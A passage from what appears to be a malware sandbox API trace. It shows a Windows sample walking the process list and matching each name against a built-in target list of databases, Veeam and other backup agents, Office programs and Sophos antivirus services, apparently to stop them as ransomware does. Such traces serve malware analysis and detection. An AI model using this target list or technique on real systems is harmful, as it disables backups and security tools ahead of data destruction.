returned="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v" [0125.244] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x2fc [0125.277] Process32FirstW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.278] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357f8e0 [0125.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x357f8e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0125.278] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0125.279] StrStrIA (lpFirst="[System Process]", lpSrch="sql") returned 0x0 [0125.279] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0125.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0125.280] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x357e168 [0125.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x357e168, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0125.280] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0125.280] StrStrIA (lpFirst="System", lpSrch="sql") returned 0x0 [0125.280] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0125.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0125.281] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3582a98 [0125.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3582a98, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0125.281] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0125.281] StrStrIA (lpFirst="smss.exe", lpSrch="sql") returned 0x0 [0125.281] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0126.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0126.008] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3582b28 [0126.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3582b28, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0126.008] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0126.008] StrStrIA (lpFirst="csrss.exe", lpSrch="sql") returned 0x0 [0126.009] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0126.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0126.010] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582bd0 [0126.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3582bd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0126.010] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0126.010] StrStrIA (lpFirst="wininit.exe", lpSrch="sql") returned 0x0 [0126.010] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0126.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0126.012] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3582b10 [0126.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3582b10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0126.012] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0126.012] StrStrIA (lpFirst="csrss.exe", lpSrch="sql") returned 0x0 [0126.012] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0126.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0126.014] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582b40 [0126.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3582b40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0126.014] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0126.014] StrStrIA (lpFirst="winlogon.exe", lpSrch="sql") returned 0x0 [0126.014] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0126.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0126.017] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582c78 [0126.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3582c78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0126.017] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0126.017] StrStrIA (lpFirst="services.exe", lpSrch="sql") returned 0x0 [0126.017] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0126.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0126.019] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3582c48 [0126.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3582c48, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0126.019] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0126.019] StrStrIA (lpFirst="lsass.exe", lpSrch="sql") returned 0x0 [0126.019] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0126.020] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582ba0 [0126.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582ba0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0126.021] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0126.021] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0126.021] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0126.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0126.022] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3582b58 [0126.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3582b58, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0126.022] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0126.022] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="sql") returned 0x0 [0126.022] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0126.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0126.024] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3582b70 [0126.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3582b70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0126.024] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0126.024] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="sql") returned 0x0 [0126.024] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0126.026] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582ca8 [0126.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582ca8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0126.026] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0126.026] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0126.026] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0126.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0126.027] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e408 [0126.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x357e408, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0126.028] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0126.028] StrStrIA (lpFirst="dwm.exe", lpSrch="sql") returned 0x0 [0126.028] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x59, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0126.029] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582cc0 [0126.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582cc0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0126.029] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0126.029] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0126.029] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0126.031] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582cd8 [0126.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582cd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0126.031] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0126.031] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0126.031] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0126.032] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582a38 [0126.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582a38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0126.032] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0126.032] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0126.032] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0126.034] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582a50 [0126.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582a50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0126.034] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0126.034] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0126.034] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0126.035] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582df8 [0126.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582df8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0126.035] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0126.035] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0126.035] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0126.037] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582fc0 [0126.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582fc0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0126.037] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0126.037] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0126.037] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0126.038] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582cf0 [0126.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582cf0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0126.038] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0126.038] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0126.038] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0126.039] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582fa8 [0126.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582fa8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0126.040] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0126.040] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0126.040] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0126.041] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582d68 [0126.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582d68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", 